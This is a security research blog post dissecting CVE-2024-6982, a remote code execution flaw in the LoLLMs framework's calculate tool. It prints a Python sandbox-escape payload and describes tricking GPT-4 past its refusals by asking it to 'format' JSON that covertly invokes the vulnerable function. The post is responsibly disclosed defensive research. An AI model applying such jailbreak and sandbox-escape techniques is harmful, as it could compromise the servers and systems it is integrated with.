Anatomy of an LLM RCE

October 28, 2024 Shaked Reiner

Robo with spider anatomy

As large language models (LLMs) become more advanced and are granted additional capabilities by developers, security risks increase dramatically. Manipulated LLMs are no longer just a risk of ethical policy violations; they have become a , potentially aiding in the compromise of the systems they’re integrated into. These critical threats have recently been identified in various applications, from a data framework for LLMs known as LlamaIndex to an SQL agent called Vanna.AI and even an LLM integration framework LangChain.

In this post, we will demystify this risk by examining the anatomy of an LLM Remote Code Execution (RCE) vulnerability. We’ll start by understanding how large language models are capable of executing code, and then we’ll dive deep into a specific vulnerability we uncovered.

Intro

Give an LLM some text, and it can blabber all day; teach an LLM to run code, and it can solve problems endlessly.

While this is likely the thinking in most AI companies today, from a security perspective, it can be a double-edged sword. The highly capable LLMs can be turned against their developers by attackers. An LLM, as suggested by its name, is just a large language model. It gets input from the user and outputs text, token by token, that can create an answer to a question, a hallucination (some might say bullshit) or even code. How can we turn a text-outputting machine into an agent that can perform tasks and run code? The truth is that we can’t. We must use a component that’s external to the LLM in the form of traditional software, rather than a neural network like the LLM itself. Since we know LLMs can be jailbroken almost 100% of the time   — and we know they don’t have the ability to execute code on their own — the question then becomes not whether the LLM itself can be vulnerable to an attack, but whether the integrations between the LLM and its external components are.

Demystifying LLM Code Execution

To better understand this interface between an LLM and the external world, let’s examine the simple integration that exists in LoLLMs. LoLLMs is a “hub for LLM (Large Language Models) and multimodal intelligence systems. This project aims to provide a user-friendly interface to access and utilize various LLM and other AI models for a wide range of tasks”. For our purposes, we used the OpenAI integration with gpt-4-turbo-2024-04-09.

We’ll work on the calculation functionality, which enables the LLM to perform arithmetic operations if needed. Generally speaking, the components in such an integration between an LLM and some sort of external component can be seen in the following diagram.


Figure 1

Let’s see how those components manifest in the LoLLMs calculate functionality shown in the figure below.


Figure 2

First, we have the system prompt (1). A system prompt is an instruction to the LLM that is added to every session. It is designed to guide the behavior, tone, style and scope of the LLM’s responses during this session. A system prompt can also make the LLM aware of the tools at its disposal. In our case, it’s the arithmetic calculation function. In the following snippet from the system prompt we can see the relevant parts for our calculator.

!@>system:
!@>Available functions:
...
Function: calculate
Description: Whenever you need to perform mathematic computations, you can call this function with the math expression and you will get the answer.
Parameters:
  - expression (string):
...

Your objective is interact with the user and if you need to call a function, then use the available functions above and call them using the following json format inside a markdown tag:```function
{
"function_name":the name of the function to be called,
"function_parameters": a list of  parameter values
}
```
!@>current_language:
english
!@>discussion_messages:

At the start of the system prompt, the LLM is informed that there are functions available to it followed by a description of each of those functions. Our calculate function is listed in those, with its description that lets the LLM know it can use it whenever it needs to perform a mathematic computation. It is told to call this function with a math expression string. At the end of the prompt, the LLM is told its objective: to interact with the user and call any of the functions, if needed, using a simple JSON formatting calling convention. In this case, it needs to specify the name of the function and its parameters. Our expectation of the LLM is to “understand” what capabilities are available to it and when it sees a complex mathematical expression, to format its output as follows:

```function
{
"function_name": "calculate",
"function_parameters": {
  "expression": "
"
	}
}
``` 

So far, we have covered these components: (1) The system prompt that teaches the LLM how to use the integration, (2) a math expression input by the user and (3) the specific format the LLM must use in order to execute the function. How do we get from a simple LLM output to code execution? That’s where some simple good old Python code comes into play.

Let’s follow the call stack starting with interact_with_function_call(), which calls the function generate_ with_function_calls() that is performing LLM inference using the user input. This function should return LLM-generated text, as well as an array of function calls required to be executed according to the user input (step 3 from Figure 1). To do that, it calls the extract_function_calls_as_json() function.

# https://github.com/ParisNeo/lollms/blob/ccf237faba17935efd1e8ecbbf12f494c837333b/lollms/personality.py#L3870-L3871

# Extract the function calls from the generated text.
function_calls = self.extract_function_calls_as_json(generated_text)

return generated_text, function_calls

The function responsible for extracting function calls simply detects code blocks outputted by the LLM, checks whether they are formatted exactly as they should be for a function call, and extracts the function name and parameters as follows:

# https://github.com/ParisNeo/lollms/blob/ccf237faba17935efd1e8ecbbf12f494c837333b/lollms/personality.py#L4049

function_calls = []
for block in code_blocks:
    if block["type"]=="function" or block["type"]=="json" or block["type"]=="":
        content = block.get("content", "")
        try:
            # Attempt to parse the JSON content of the code block.
            function_call = json.loads(content)
            if type(function_call)==dict:
                function_calls.append(function_call)
            elif type(function_call)==list:
                function_calls+=function_call
        except json.JSONDecodeError:
            # If the content is not valid JSON, skip it.
            continue

After extracting the function call object containing the function name and its parameters, interact_with_function_call() uses execute_function_calls() to execute it. For the execution of the specified function name, execute_function_calls() searches the name in the available function definitions (a function definition for each of the available tools), and simply invokes it:

# https://github.com/ParisNeo/lollms/blob/ccf237faba17935efd1e8ecbbf12f494c837333b/lollms/personality.py#L3930-L3931

fn =  functions_dict.get(function_name)
if fn:
    function = fn['function']
    try:
        # Assuming parameters is a dictionary that maps directly to the function's arguments.
        if type(parameters)==list:
            f_parameters ={k:v for k,v in zip([p['name'] for p in fn['function_parameters']],parameters)}
            result = function(**f_parameters)
            results.append(result)
        elif type(parameters)==dict:
            result = function(**parameters)
            results.append(result)

The final step for component (4) is invoking the calculate function:

def calculate(expression: str) -> float:    
    try:
        # Add the math module functions to the local namespace
        allowed_names = {k: v for k, v in math.__dict__.items() if not k.startswith("__")}
        
        # Evaluate the expression safely using the allowed names
        result = eval(expression, {"__builtins__": None}, allowed_names)
        return result
    except Exception as e:
        return str(e)

calculate simply takes the mathematical expression provided by the LLM and uses eval to calculate it in some sort of Python sandbox. After all that, the LLM will get a formatted result and will create a final output that’ll be returned to the user in component (5). We now have a full understanding of user input to code execution and back.

From Prompt to Arbitrary Code Execution

Putting on our attacker hats, we’ll examine the security of this integration. Can we make the LLM run any code we like?

Starting by examining the Python sandbox in the calculate() function, we see that the expression is sent to Python’s eval without any built-in function (“__builtins__”: None) and with a limited list of allowed names taken from the math module k: v for k, v in math.__dict__.items() if not k.startswith(“__”), i.e., all functions but internal ones that usually start with __). Is this sufficient to prevent us from executing arbitrary code?
Sandboxing Python code is challenging due to its dynamic typing, which allows code to modify itself and the powerful built-in functions that are difficult to restrict without breaking functionality. The easiest way of demonstrating how to execute arbitrary code is to execute a command on the server running the Python sandbox. This can be done using the os.system() function in Python. In our case, the sandbox is trying to prevent us from importing any external modules by disabling the built-in functions. To bypass that, we’ll use a known PyJail trick (one of many here) that gets the _frozen_importlib.BuiltinImporter object out of a new tuple, and uses that to import the os model as follows: ().__class__.__base__.__subclasses__()[108].load_module(‘os’). After importing the module, it’s only a matter of calling the .system() function to run whichever command we like on the server.


Figure 3 – Python sandbox escape

Let’s try to ask the LLM to calculate this expression and see if we can execute arbitrary code. We’ll start by requesting the calculation of a simple math expression, followed by our payload.


Figure 4 – #1 escape attempt

Nope. We know how to bypass the Python sandbox, but we need to make the LLM send our input expression to the calculate function for it to work. Looks like GPT-4o has a sense that something is off here and doesn’t even try to invoke this function. This is probably due to OpenAI’s safety alignment. We understand that to execute arbitrary code, we not only need to bypass the sandbox but also the LLM alignment using some sort of jailbreak. This is where it’s worth mentioning that since LoLLMs is LLM agnostic and can work with multiple models, this jailbreak required is model-dependent. There are two options for that: Either we jailbreak the model and make it play along with the attack and execute arbitrary code on the server, or we trick it into triggering the vulnerable function without realizing it’s going to compromise the server. The latter can be more elegant, so we’ll go with that. Remember that for our external code executer to work, all the LLM has to do is output a properly formatted JSON code block containing the function name and its parameters. Let’s naively ask the LLM to output it.


Figure 5 – #2 escape attempt

Seems like GPT-4o is not that gullible. We need to think of something else that will make it output this JSON without realizing its real purpose. What if we ask it for help in formatting the JSON?


Figure 6

It worked! GPT-4o thinks it just helped us with this simple JSON, but really it triggered our arbitrary code execution and our file has been created. This is how we can leverage the tools at the LLM’s disposal and make it run arbitrary code, starting from a simple natural language prompt.This vulnerability was responsibly disclosed to LoLLMs and has been fixed. It was issued CVE-2024-6982.


Figure 7 – Prompt to reverse shell demo

Conclusion

LLM integrations are a double-edged sword. We can get better functionality and an improved user experience, but it comes with a security risk. At the end of the day, we must understand that any ability given to an LLM can be exploited against the system by an attacker. Post-exploitation techniques may focus on the LLM itself, such as backdooring, data extraction or exploiting further integrations, or they might target traditional non-LLM components, like host privilege escalation or lateral movement. For general information on how to securely integrate LLMs into systems and how to implement proper privilege controls, check our previous post.

Shaked Reiner is a principal cyber researcher at CyberArk Labs.

Previous Article
Discovering Hidden Vulnerabilities in Portainer with CodeQL
Discovering Hidden Vulnerabilities in Portainer with CodeQL

Recently, we researched a project on Portainer, the go-to open-source tool for managing Kubernetes and Dock...

Next Article
How to Protect Your IoT and OT Devices from Cyberthreats
How to Protect Your IoT and OT Devices from Cyberthreats

The rise of the Internet of Things (IoT) and Operational Technology (OT) devices is reshaping industries, a...